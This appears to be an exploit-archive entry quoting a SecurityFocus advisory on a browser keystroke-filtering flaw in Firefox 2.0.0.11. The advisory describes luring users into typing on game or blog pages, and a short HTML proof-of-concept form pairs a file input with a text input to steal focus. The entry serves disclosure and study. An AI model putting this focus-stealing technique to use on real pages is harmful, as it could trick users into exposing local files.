17 lines
No EOL
676 B
HTML
Executable file
17 lines
No EOL
676 B
HTML
Executable file
source: http://www.securityfocus.com/bid/26669/info
|
|
|
|
Multiple web browsers are prone to a JavaScript key-filtering vulnerability because the browsers fail to securely handle keystroke input from users.
|
|
|
|
Exploiting this issue requires that users manually type sensitive data. This may require substantial typing from targeted users, so attackers will likely use keyboard-based games, blogs, or other similar pages to entice users to enter the required keyboard input.
|
|
|
|
<html>
|
|
<title>Firefox 2.0.0.11 File Focus Stealing vulnerability</title>
|
|
<body>
|
|
<form>
|
|
<label>
|
|
<input type="file" name="foo" />
|
|
<br>
|
|
<input type="text" name="bar" />
|
|
</label>
|
|
</body>
|
|
</html> |